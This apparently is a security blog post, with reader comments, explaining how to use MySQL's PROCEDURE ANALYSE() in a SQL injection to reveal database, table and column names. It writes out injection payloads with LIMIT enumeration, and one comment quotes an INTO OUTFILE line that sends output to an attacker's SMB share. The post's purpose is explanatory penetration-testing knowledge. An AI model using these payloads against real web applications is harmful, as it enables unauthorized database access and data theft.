MySQL table and column names (update)

While reading at sla.ckers.org about some ways to get a SQL injection working if your injection point is behind a “group by” and a “limit” clause, Pragmatk came up with the PROCEDURE ANALYSE operation (available on MySQL 3/4/5) I didnt knew of yet. Although it didnt quite solve the actual problem, because it seems that you cant build some dynamic parameters for the ANALYSE function so that you could build blind SQLi vectors, it does give you information about the used database, table and column names of the query you are injecting to.
So this is another way of finding table and column names on MySQL without using the information_schema tables or load_file(). Unfortunetly you will only get the names of the columns and tables in use, but at least it will make guessing easier or maybe some columns are selected but not displayed by the webapp so that you can union select them on a different position where they do get displayed.

Here is an example: Lets assume a basic SQL query you will encounter quite often:

SELECT id, name, pass FROM users WHERE id = x

while x is our injection point. Now you can use

x = 1 PROCEDURE ANALYSE()

to get all column names, including the database and table name currently selected. You will see something like this:

test.users.id
test.users.name
test.users.pass

Depending on the webapp you will need to use LIMIT to enumerate the result of PROCEDURE ANALYSE() line by line which contains the names in the first column of each row:

x = 1 PROCEDURE ANALYSE() #get first column name
x = 1 LIMIT 1,1 PROCEDURE ANALYSE() #get second column name
x = 1 LIMIT 2,1 PROCEDURE ANALYSE() #get third column name

With that said it is neccessary that the webapp will display the first selected column, because PROCEDURE ANALYSE will reformat the whole result with its information about the columns which is normally used to identify the best datatype for this column.
Interesting operation, I wonder if there are any other I dont know of yet which can be useful in the right circumstances.

More:
update2

About these ads

8 Responses to MySQL table and column names (update)

  1. sid says:

    SQL Injection in order by and group by:-

    http://www.notsosecure.com/folder2/2008/08/01/injection-in-order-by-clause/

    You can use UNION query to exploit injection in LIMIT, OFFSET query. I will post that sometime later.

    • Reiners says:

      hi sid, thanks for your link, unfortunetly this is not what we were looking for. we are trying to exploit a query with “group by” followed by a “limit”. both operations are simple to exploit on there own but not if they are combined.

  2. sid says:

    i see, you could still use into outfile (file privileges).

    However, i doubt if it can be of any much use either

  3. sid says:

    check this, may be this can help, in this scenario, however, it will work with windows + FIle privs.

    http://www.notsosecure.com/folder2/2009/02/13/my-sql-exfiltrating-data-over-out-of-band-channelsoob/

  4. adamastor says:

    i’m not getting any result
    in a query like: x = 1 LIMIT 1,1 PROCEDURE ANALYSE() but if i take the LIMIT, it works! any ideia?!

  5. Reiners says:

    ah very nice, I just knew about the INTO OUTFILE ‘\\\\attacker\\SMBshare\\output.txt’ which is mostly useless.

  6. Pieter says:

    Thanks for this article (and your others). They’ve taught me a great deal about web app vulnerabilities and SQL injection. (Thanks to Pragmatk for the idea, of course)

    While I was playing around with this I couldn’t get it to work in combination with a UNION ALL SELECT. Do you think this is possible?

  7. paol says:

    @Pieter. I had the same problem.
    I suppose it will only work only you have exactly 10 columns in the first statement. (procedure analyse outputs 10 columns by default, and I couldn’t find a way to limit this)

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

Join 85 other followers

%d bloggers like this: